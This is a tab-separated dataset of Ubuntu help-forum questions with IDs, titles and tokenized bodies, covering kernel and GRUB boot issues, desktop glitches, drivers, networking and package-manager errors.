63076	default kernel is missing from grub 1 menu	i have ubuntu 11.04 dual boot with xp . i have upgraded to natty from ubuntu 10.11 by using command do-release-upgrade some months ago . the update manager asked for some updations included the package `` linux-headers-2.6.38-11 '' . i installed this package then . i used command uname -r . it says current running version is 2.6.36 . by the command grub-install -v i had come to know that i 'm using grub legacy only , not grub 2 then i tried sudo update-grub and i verified that menu.lst file has an entry for for all kernels available in local disk . /boot/grub/menu.lst contains both kernels 2.6.36 & 2.6.38 and some other entries.the content of menu.lst is here but on reboot the grub menu does n't show the newer version of kernel . how to make kernel 2.6.38-11-generic as default kernel ? even though grub 2 is default to natty , i had n't . why ? what are the things should i check before my future upgradation ( to coming ubuntu 11.11 ) ? how to make a kernel ( in this case 2.6.38-11-generic ) as default kernel ?
63077	how do i stop xfce4 from respawing programms running at logout on login ?	i disabled the checkbox `` save session automatically '' in preferences = > session . still all the programms start but i do n't want them to . oh , strange thing : the windowmanager does not start . i 've got to log in at the console and enter display=:0.0 xfwm4 . it 's somthing new , but i guess it has a common error source .
63078	how to access ubuntu 11.04 files in windows 7 ?	i installed ubuntu 11.04 sometimes back within windows 7 using wubi . lately , i turned off my computer while ubuntu was shutting down . since then whenever i try booting ubuntu , i get a segmentation fault error and busy box opens by default . since i have crucial data on ubuntu disk , i want to access the ubuntu files from windows 7 . is there any software which allows me to do so ? note : for ubuntu installed within windows , all the data is stored in a file root.disk . one way to read it is by using ext2explore .
63084	power cog is gone from the panel	i 've tried the solution from here the `` power cog '' has disappeared but that does n't solve anything , i have indicator-session installed but the cog is gone still . is this a know issue at this stage and will it be fixed come release day ?
63085	how do i directly boot to a terminal , bypassing x11 ?	i am seeking a help regarding the following issues : how to turn off the x server when i have already logged into ubuntu ( i know about startx to start the x server but do n't know how to shut it down ) . when i start my machine , ubuntu directly boots automatically x . what i need to do if i want to boot to plane terminal instead of x ? ( after that i can use startx to start the x if i feel so ) .
63086	broken sound volume indicator - ca n't change volume	i have ubuntu 11.04 ( natty narwhal ) and the sound indicator in the panel sometimes breaks down . i assume it is probably because the sound system crashes or something . when this happens , the sound indicator shows just three dashes instead of the current volume , i ca n't change the volume using the volume up/volume down keys on my keyboard , not can i change it using the slider that shows when i click on the sound indicator . when i click on the sound indicator and then click on the `` sound preferences '' in the popup menu , a message box appears , saying something like `` waiting for sound system to respond '' . i found that this is due to crashed pulseaudio ( whatever that is ) and i should type pulseaudio -- start to start it again . after i do that , i can open the sound preferences and adjust the volume from there , but i still ca n't change the volume using the multimedia keys on my keyboard , nor using the volume slider in the sound indicator . so my questions : is there a way to stop pulseaudio from crashing ( assuming this is the cause for the indicator to break down ) ? if not , is there at least a way to restore the volume indicator after the pulseaudio system has been restarted , so the volume keyboard shortcuts and the slider work ( maybe a way to restart the indicator itself ) ?
63099	`` command not found '' when running `` lessc '' from bash	i have installed lessc via npm , node.js package manager , and when i run lessc from terminal using lessc /var/www/less/style.less /var/www/css/style.css it works perfectly . however , when i put this exact same command in a bash script , less.sh , it returns the error lessc : command not found . also , i need to run this command from a bash script , because incron , a program which i am using to re-compile my less script each time they are modified , is unable to run the command mentioned above , which i believe may be caused by weird methods for handling white-space in the command .
63101	not possible to click on systray	when i am using unity 3d , clicking on the systray does n't work . for example , in the picture bellow : if i want to click on the pidgin , ubuntu one , synapse , ... icon , it does n't work at all , meaning that nothing happens . i have to click on the datetime indicator and after that go with the mouse on the left side until i reach to the desired application . with unity 2d this is not happening , everything is ok . i have used this tutorial to enable the notification area : http : //www.webupd8.org/2011/04/how-to-re-enable-notification-area.html
63106	internet speed problem	i 'm using ubuntu 11.04 and i 'm having a hard time while browsing the web . when for an example i 'm trying to watch a movie on youtube , at the same time i ca n't access any other webpage - it 's simply not loading . after when the youtube movie is done loading i can open other webpages . i used to have this problem on linux mint . i have solved it back then by changing drivers for my ethernet . but now while on the same machine i 'm unable to find the drivers listed in the 'additional drivers ' . what should i do now ? if this helps : 08:00.0 ethernet controller : broadcom corporation netlink bcm5784m gigabit ethernet pcie ( rev 10 )
63107	is there any on screen keyboard to use on inspiron duo in tablet mode ?	i have ubuntu 11.04 installed on a dell inspiron duo hybrid . almost everything works fine except for the accelerometer . but when using ubuntu in tablet mode , i could n't find anyway to have a onscreen keyboard automatically appear when typing is required , eg . pointing to the address bar in browser . i am a total ubuntu newbie ! any ideas ?
63109	to allocate data usage efficiently with two internet connections	assume you have two connections in mobile broadband and wifi . i would like to allocate manually given packages to given connections . for instance , my bank connection to mobile broadband and my internet surfing and software downloads to wifi . how does ubuntu 11.10 or 11.04 allocate the usage of two connections to google chrome ? how can you manually decide which internet connection to use with wget ? do you need any external command to do the allocation ? - in my opinion , it would be much more orthogonal and efficient if you could have an external program to do the allocation . - i could then simply launch my google chrome to the wanted connection manually .
63113	ubuntu mounts external drive that is no longer in /etc/fstab	about a month ago , i configured my /etc/fstab and added an external drive . i do n't need it anymore so i edited my /etc/fstab and removed the declaration line . this morning i rebooted my development server and grub stopped with a warning that this drive was not available : do i wait , skip and manually recover ? ? what am i missing ? what is it still seeing my external drive ? ? running ubuntu 11.04 ...
63116	install only virsh command utility to manage kvm vms ( without gui )	i want to only install the packages that provide virsh to create and manage kvm virtual machines . what do i need to install , what do i need not install to skip the gui elements ? for the record , i want to run them headless . kvm displays the vms ' visual output using vnc transmitting on certain ports . it would be great if someone could tell me how to know and control what those ports are .
63117	list of gnome 3 applets and gnome-shell extensions	i installed ubuntu 11.10 on one of my systems and i am using gnome-shell . i miss some tools for showing weather , unread mail , net speed , cpu temp , and system monitor . are there similar indicators as presented in list of application indicators ?
63118	how to remove bottom information panel in terminal window on ubuntu server ami images ?	the amazon ami images have a default information panel at the bottom of the terminal window . i would like to remove this ( it disables me from being able to scroll backwards in putty ) . it looks like this at the bottom of my terminal window : 0* $ sh my_login_name @ ec2-100-00-100-10.compute-1.amazonaws.com 100.10.100.10 ... u ubuntu oneiric 1 # 3d20h 0.00 2.6ghz 592mb,43 % 2011-09-26 18:12:05
63120	how to remove “apps available for download” from dash ?	i know that this is n't possible in natty , but this could be done in 11.10 ?
63121	server ami images do n't allow a user to login multiple times	when i log into twice to a new instance of ubuntu server built for amazon ec2 , both windows will be exactly the same . anything i type in one is replicated in the other . i never dealt with this when i built the image myself . does anyone know about this ? i normally like to have a few putty windows open logged into the terminal of my servers .
63122	how do i get entries in a quick list to open in their own window ?	i 've created a few custom apps .eg facebook , google plus . i want them to open in ther own window instead of google chromes window ( the white arrow showing open applications on the unity launcher ) . can anyone help me do this ?
63126	how do i change the `` selected items '' color ?	i was trying to change the selected items color from the default orange to something else , however , the option is n't there , as it used to be in the appearance properties in previous versions of ubuntu . any idea where it could be in the beta ?
63127	does quickly support gtk3 ?	simple question : can quickly use gtk2 only or also gtk3 for gui ?
63130	where is the openjdk console window ?	i am used to java-sun jdk on windows and its console : it is very convenient to debug an applet . is there such console with open-jdk on ubuntu ?
63131	where is dnsmasq started and configured ?	where is dnsmasq started and configured during the system startup under ubuntu lucid server ? i have not been able to find any startup script or service that actually starts and sets up dnsmasq . i would like to get rid of the dhcp service , or prevent it from starting altogether .
63134	how to get the proper lightdm theme ?	i 've been using oneiric since the second alpha ( had to , my new system refused to run any older ubuntu version ) and i 've never been able to get the nifty lightdm theme i 'm seeing everywhere . instead , i 'm alway seeing this theme instead : can anyone explain to me how to change / fix this ? also when i do a sudo dpkg-reconfigure lightdm , it gives the following warnings , could that be related to my problem ? : dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_name missing dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_package missing
63137	how make my logitech quickcam e3500 work ?	i have an asus5431 laptop with a built in webcam . this is detected and works fine in cheese and everyother application . ( /dev/video0 ) i also have a quickcam e3500 which is detected by ubuntu , appears to be loaded as /dev/video1 . only problem is that there is no video . i can use the inbuilt microphone and change the led status with gstreamerproperties ( i cam make it flash at whatever frequency i like : ) ) . but no video i know the camera works since in mac os and windows it is fine . i do not need the in-built camera since the laptop is under the sofa . any ideas anyone ?
63138	logitech rumble gamepad f510	i recently i bought a logitech f510 gamepad . unfortunately , it does not work properly for me . i have tried to calibrate the device with jstest-gtk without any success - i can not get all the axes working properly . so because of this , playing games like trine or steel storm with the gamepad is not possible . connecting the gamepad i get following output : [ 28445.660054 ] usb 4-3 : new full speed usb device number 2 using ohci_hcd [ 28446.504708 ] registered led device : xpad0 [ 28446.504858 ] input : generic x-box pad as /devices/pci0000:00/0000:00:12.1/usb4/4-3/4-3:1.0/input/input7 [ 28446.505403 ] usbcore : registered new interface driver xpad following values i get with evtest ( all gamepad sticks are in the center ) : input driver version is 1.0.1 input device id : bus 0x3 vendor 0x46d product 0xc21e version 0x2019 input device name : `` generic x-box pad '' supported events : event type 0 ( sync ) event type 1 ( key ) event code 304 ( btna ) event code 305 ( btnb ) event code 307 ( btnx ) event code 308 ( btny ) event code 310 ( btntl ) event code 311 ( btntr ) event code 314 ( btnselect ) event code 315 ( btnstart ) event code 316 ( btnmode ) event code 317 ( btnthumbl ) event code 318 ( btnthumbr ) event type 3 ( absolute ) event code 0 ( x ) value 128 min -32768 max 32767 fuzz 16 flat 128 event code 1 ( y ) value -129 min -32768 max 32767 fuzz 16 flat 128 event code 2 ( z ) value 0 min 0 max 255 event code 3 ( rx ) value 128 min -32768 max 32767 fuzz 16 flat 128 event code 4 ( ry ) value -129 min -32768 max 32767 fuzz 16 flat 128 event code 5 ( rz ) value 0 min 0 max 255 event code 16 ( hat0x ) value 0 min -1 max 1 event code 17 ( hat0y ) value 0 min -1 max 1 event type 21 ( forcefeedback ) event code 80 ( rumble ) event code 81 ( periodic ) event code 88 ( square ) event code 89 ( triangle ) event code 90 ( sine ) event code 96 ( gain ) does anybody have an idea how i can get the gamepad working properly or if there is a new version of the driver for it ?
63139	how to stop excessive memory usage of unity-window-decorator ?	i am using ubuntu 11.04 on an amd64 computer . when i boot the computer the memory usage of unity-window-decorator is few tens of mb ( checked with system monitor ) c after many hours using google chrome , libreoffice , kile , skype etc . the memory usage for unity-window-decorator increases to almost 1 gb . today i made sure that not many programs run simultaneously and quit them after each use . again as time passed the memory usage of the unity-window-decorator increased to almost 1 gb . using /usr/bin/unity-window-decorator -- replace the memory usage is reduced drastically but this time there are no window decorations . /usr/bin/unity-window-decorator & restarts the software thus bringing the window decorations but also starts the cycle of increased memory use again . what should i do to stop this excessive memory use ?
63142	how do i get a floppy drive working ?	a friend 's mum has some childhood photos on a `` thing '' she wanted me to access . turns out to be an old floppy drive . i dusted off my old ultraybay floppy drive for the t21 laptop i still have kicking around . i had to reboot to get floppy drive to show on desktop . but it reads all disks as blank , regardless of content . so i can not say for sure if these photos can be accessed or not . i know it 's ancient tech , but quite important to get working in this instance ... i have tried loading floppy module : sudo modprobe floppy but no dice .
63150	transmission tracker and/or torrent traffic through proxy	i am trying to get transmission to connect through a sockv5 proxy . i am not able to find any settings in the graphical interface to transmission that allows me to change proxy server for the program . is there any other program that could help me tunnel the transmission traffic - for example like proxifyer for windows ?
63153	how do i configure catalyst to cool down my graphics card ?	i 've been struggling with this issue for some time with no solution in sight . basically , i think i have an overheating graphics card and i tried to follow the steps given here so i installed catalyst which is the ati proprietary driver but my overheating problem seems to persist . my temperature is about 65 degrees c when idle and shoots up to 80 when i open up a couple of programs ! i know it 's not a dust issue because because everything runs much , much cooler on windows 7 for me . i 'm sure it 's a driver issue . so i opened up the catalyst control center and i want to know what do i need to adjust in order to cool down the graphics card ? i tried tweaking a few things but to no avail . graphics card is : vga compatible controller : ati technologies inc m76 [ radeon mobility hd 2600 series ] kernal version is : 2.6.38-8-generic # 42-ubuntu smp ubuntu version is : 11.04
63155	qt creator does n't run	i have ubuntu installed on a virtual machine ( vm ware ) . i downloaded the meego sdk including qt creator , it ran fine for the first time . after that when i run the qt creator it just does n't run , nothing happens . when i run it in a terminal it does n't display anything , it just does n't run . has anybody seen something like this ?
63158	how to create a debian source package with qt creator ?	what do i need to do to get a package that i can submit to the ubuntu software center ?
63160	how to override the dhcp-provided nameserver ?	i ( think ) that i 've configured a static ip address in /etc/network/interfaces : # the primary network interface auto eth0 iface eth0 inet static address 10.1.1.2 netmask 255.255.255.0 network 10.1.1.0 broadcast 10.1.1.255 gateway 10.1.1.1 and i change the file /etc/resolv.conf to include the desired nameservers . then i restart networking sudo /etc/init.d/networking restart but after some hours resolv.conf always reverts back to the dhcp nameserver . i should also say that this is ubuntu server with only l0 and eth0 interfaces .
63161	live support/chat app for ubuntu	yesterday i was testing the providesupport software from the same providesupport.com site . it had an ubuntu installer and all but after checking out pricing i was wondering if ubuntu or in the linux community there was a similar product that was free that provided at least a way for customers to communicate with the operators or sellers . for all that do not know , it basically works that you install it on your web site and customers connect to it via a `` live chat '' system that you then connect to the operators or people that will answer your call . its pretty neat but a free version would be nicer and even more if in the debian/ubuntu repos .
63162	debugging applications in qtcreator	everytime i go to debug some code in qtcreator , i get this gdb error returning . current setup : ubuntu 11.04 qt creator version : 2.1.0 gdb version : gnu gdb ( ubuntu/linaro 7.2-1ubuntu11 ) 7.2 debugging starts & '' warning : gdb : failed to set controlling terminal : invalid argument\n '' i 've also tried debugging from cli with the following results : charles @ virtubuntu : ~/documents/it327/day3/lab1-build-desktop $ qtcreator -debug lab1 warning : handle runcontrol start failed ( no active run control ) unexpected state transition : `` state changed from enginesetupfailed ( 2 ) to debuggerfinished ( 21 ) . '' warning : state changed from enginesetupfailed ( 2 ) to debuggerfinished ( 21 ) . ( no active run control ) warning : ( gdb ) ( no active run control ) any ideas on how to resolve this so i can actually debug my code ?
63172	how to remove the user name from xubuntu session menu panel applet ?	i never need my user name to be shown on the desktop as i am the only one to use my computer . i 'd prefer if there would be something like a shutdown icon instead of the user name to open the session menu . how to achieve this in xubuntu 11.10 ?
63173	pinyin input for traditional chinese characters ?	i read online ( e.g . http : //www.pinyinjoe.com/linux/ubuntu-910-openoffice-chinese-setup.htm ) that ibus-chewing supports phonetic input of traditional characters using the pinyin system but i can not get it to work under ubuntu oneiric . the problem boils down to being able to change the keyboard type which i can not do using the interface provided . any ideas ?
63175	installation fails with `` error : no such disk ''	i installed ubuntu 11.04 with the cd . my computer already has windows 7 , and i want to install ubuntu , the installation process takes place normally , i used to be ubuntu , but when my windows 7 to escape and use it on ubuntu then an error occurs is : error : no such device 00000000 0000000000000 -- -- -- -- -- -- - -- -- -- -- - 000,000 000,000 error : no such disk error : you need to load the kernel first press any key to continue ... . i had to reinstall ubuntu again , but the results remain like that . who can show me how to fix on it ?
63178	how to set up keyboard layout switching and indication in xubuntu ?	i use 3 different languages ( english , czech and russian ) every day . i 'd prefer to switch ( preferably globally , i do n't like per-window ) between them with left+alt+shift . i 'd also like to see the active language indication . unfortunately i could n't find any obvious way to set this up in xubuntu 11.10 - there is even no keyboard indicator applet available in the panel configuration . any recommendations ?
63179	how to set up transparent background in xfce terminal ?	i ca n't find the option to make the terminal background transparent : - ( any idea where can it be ?
63180	slow installation of applications in ubuntu software center ?	i have installed ubuntu 11.04 desktop and i am in the process of learning . i want to install some applications from the ubuntu software center , but the installation process is quite long and slow . with the ubuntu software center , i can only install and download one application for a time . so i want to ask is there a way to speed up the process of installing software through the ubuntu software center , like a multi-tasking program ?
63184	freeing up audio device	i am trying to run an executable that plays a sound with the portaudio library . when i compile and run the filesystem i get the following error . error number : -9985 error message : device unavailable i am wondering how to free up the audio device and run the executable and return the audio device back to the way it was so i can use it with the system .
63185	where should i put newly build software ?	i have been curious for a long time about software installation in linux ( ubuntu ) . because i am so used to windows os , every software is installed by some sort of 'wizard ' , usually i do n't need to configure anything , just click 'next ' and that 's it , but in linux world , there are a lot of software need to be build by running some commend , typically , a bunch of .c files . even i know the structures of the files system of linux system , but i still do n't fully understand where should each file go after a build , for example , some software have executables , and a config file , these two should be located separated somehow . and sometimes , in order to make the executable to be searchable , i can not simple put every thing in my custom folder . i feel strongly that there should be a convention for installing software in linux box ( especially for those need to be build from commend ) . so , is there a convention ? how to make my installed software files well organized , so they are not falling apart .
63186	do i really have to hold the super key in unity 2d ?	i am switching to 2d and it 's looking good . but it seems like i ca n't do my usual super+ ... combinations . for example , super+f does n't do anything . it 's running much faster and i 'm really pleased with that . there are a couple of things that do n't seem to work so well , however . if i want to switch between running applications ( e.g . super+2 ) nothing happens - it just opens the dash ! it seems i have to hold super down for half a second before i press 2 . i do n't mean to be picky , but half a second delays adds up to quite a lot in a full day 's working . is there any way to get this instant like in 3d ?
63187	apt-get returning 'sub-process /usr/bin/dpkg returned an error code ( 1 ) '' error	i am facing a problem while installing any program . i get an error of sub-process /usr/bin/dpkg returned an error code ( 1 ) . following is log of the output of apt-get -f install i am using ubuntu 10.10 on dell inspiron 1564 and wireless driver : sta wireless driver . any idea what 's wrong with my package manager ? tahir @ tahir-inspiron-1564 : /var/www $ sudo apt-get -f install [ sudo ] password for tahir : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 24 not upgraded . 5 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up linux-image-2.6.35-27-generic ( 2.6.35-27.48 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-27-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic * dkms : running auto installation service for kernel 2.6.35-27-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-27-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.35-28-generic ( 2.6.35-28.50 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-28-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic * dkms : running auto installation service for kernel 2.6.35-28-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-28-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.35-30-generic ( 2.6.35-30.59 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-30-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic * dkms : running auto installation service for kernel 2.6.35-30-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-30-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-30-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.35-30-generic ; however : package linux-image-2.6.35-30-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.35.30.38 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- confno apport report written because maxreports is reached already no apport report written because maxreports is reached already igure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-2.6.35-27-generic linux-image-2.6.35-28-generic linux-image-2.6.35-30-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ** update : ** following is the output of sudo update-grub tahir @ tahir-inspiron-1564 : ~ $ sudo update-g update-gconf-defaults update-grub2 update-grub update-gsfontmap tahir @ tahir-inspiron-1564 : ~ $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : 20_* : : not found /etc/grub.d/readme : 8 : the : not found /etc/grub.d/readme : 9 : administrator . : not found /etc/grub.d/readme : 10 : 01_otheros , : not found /etc/grub.d/readme : 11 : the : not found /etc/grub.d/readme : 11 : and : not found file /etc/grub.d/readme is as given bellow . do n't know why a readme should matter . : -/ all executable files in this directory are processed in shell expansion order . 00_* : reserved for 00_header . 10_* : native boot entries . 20_* : third party apps . the number namespace in-between is configurable by system installer and/or administrator . for example , you can add an entry to boot another os as 01_otheros , 11_otheros , etc , depending on the position you want it to occupy in the menu ; and then adjust the default setting via /etc/default/grub . file : /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' file : /usr/share/grub/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_linux_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
63189	some texts appear as `` label empty ''	i 've got a problem with some of the texts not appearing in ubuntu 11.04 . i use the spanish translation of ubuntu and reinstalling the packages did n't solve the problem . you will find some screenshots appended . in the first screenshot a `` label empty '' text can be seen where it should say `` log off '' ( `` cerrar sesi贸n '' in spanish ) . the second one shows de log off screen dialog , where te button is actually empty ( says nothing ) and there are some strange characters in the question dialog . does anybody know how to fix these ?
63190	windows appear behind the panel	when opening new windows in my ubuntu 11.04 sometimes they are hidden behind the panel . i can grab them while pressing alt+button 1 but i would like to solve it so that they appear where they should . the machine where this is happening is an upgraded one and i have seen in several new installations that this is not the expected behaviour . you can see it in the following link :
63191	unity launcher crashes and leaves ghost shadow	sometimes my unity launcher crashes and shows and undesirable behaviour : although it still hides , it leaves a ghost shadow behind it . i do n't know how to solve it and the only way to recover the functional desktop is restarting the session . find attached a screenshot that shows what i 'm trying to describe :
